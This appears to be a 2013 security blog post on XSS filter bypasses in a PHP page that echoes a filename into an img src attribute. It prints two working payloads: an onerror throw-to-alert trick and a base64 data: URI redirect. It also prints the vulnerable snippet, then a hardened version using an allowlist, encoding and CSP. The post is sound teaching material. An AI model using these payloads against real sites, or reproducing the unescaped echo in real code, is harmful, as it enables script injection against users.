Saturday, July 6, 2013

XSS parentheses and brackets filter bypassing

Let's assume that injection takes place in img tag src attribute:
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="<?php echo $_GET['filename']; ?>" >
...
One approach is to use exceptions, as described here. So the injected code (the filename parameter) should look like this:
fileThatDoesNotExist" onerror="javascript:window.onerror=alert;throw 'XSS'" dummyParam="
Resulting in:
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="fileThatDoesNotExist" onerror="javascript:window.onerror=alert;throw 'XSS'" dummyParam="" >
...
But I'd like to show you another way to do XSS without parentheses and brackets by using location.href and a "data:" URI with base64 encoding. Let's inject the <script>alert("XSS")</script> code (in base64 it is PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=). So the crafted parameter should look like this:
fileThatDoesNotExist" onerror="location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='" dummyParam="
Resulting in:
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="fileThatDoesNotExist" onerror="location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='" dummyParam="" >
...
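Both payloads above work only because the raw parameter is echoed straight into the src attribute, so a double quote can close it and start an onerror handler. The hardened image.php below is an added example, not the original post's code; it assumes PHP 7 or later and that the served images live in an images/ directory next to the script.

```php
<?php
// Added example (not from the original post): a hardened image.php.
// Three independent layers, so no single mistake reopens the injection:
//  1. strict allowlist validation of the filename, never echoing raw input;
//  2. attribute-context HTML encoding of the value that is echoed;
//  3. a Content-Security-Policy without 'unsafe-inline', so an injected
//     onerror="..." handler would not execute even if 1 and 2 failed.

header('Content-Type: text/html; charset=UTF-8');
header("Content-Security-Policy: default-src 'self'; script-src 'self'; "
     . "img-src 'self'; object-src 'none'; base-uri 'none'");

$raw = $_GET['filename'] ?? '';

// Accept only a plain basename such as "logo.png": no quotes, slashes,
// spaces or dots other than the extension, and the file must exist.
$imageDir = __DIR__ . '/images/';   // assumption: images are stored here
if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.(png|jpe?g|gif)\z/', $raw)
    || !is_file($imageDir . $raw)) {
    http_response_code(400);
    exit('invalid filename');
}

// Encode for the attribute context even though the value was validated.
// ENT_QUOTES turns both " and ' into entities, so the value can never
// terminate src="..." and introduce a second attribute.
$safe = htmlspecialchars($raw, ENT_QUOTES | ENT_HTML5, 'UTF-8');
?>
<img src="images/<?php echo $safe; ?>" alt="">
```

With this policy the browser refuses to run the inline onerror handler at all, so neither the throw-based nor the location.href variant reaches its payload; the allowlist and encoding would stop the injection on their own in browsers without CSP support.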

8 comments:

  1. Any reason why you use location.href , any other DOMs can be used?
